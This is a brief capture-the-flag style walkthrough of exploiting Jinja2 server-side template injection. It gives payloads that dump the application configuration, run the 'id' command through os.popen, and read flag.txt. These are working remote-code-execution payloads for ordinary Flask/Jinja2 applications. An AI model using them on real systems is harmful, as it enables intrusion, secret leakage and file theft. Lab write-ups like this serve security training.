Exploiting SSTI - Jinja2

Exploit the SSTI vulnerability to obtain RCE and read the flag.

In this exercise we are already assuming that the web application uses Jinja template engine.

Lets first try to obtain the web application configuration with the following payload:

{{ config.items() }}

The payload worked perfectly. As we can see, we managed to get the web application configuration. Now lets try to do a Remote Code Execution (RCE) with this payload:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

And it worked!

After a few tries we would eventually end with the following payload to retrieve our flag:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read() }}

And we found the flag!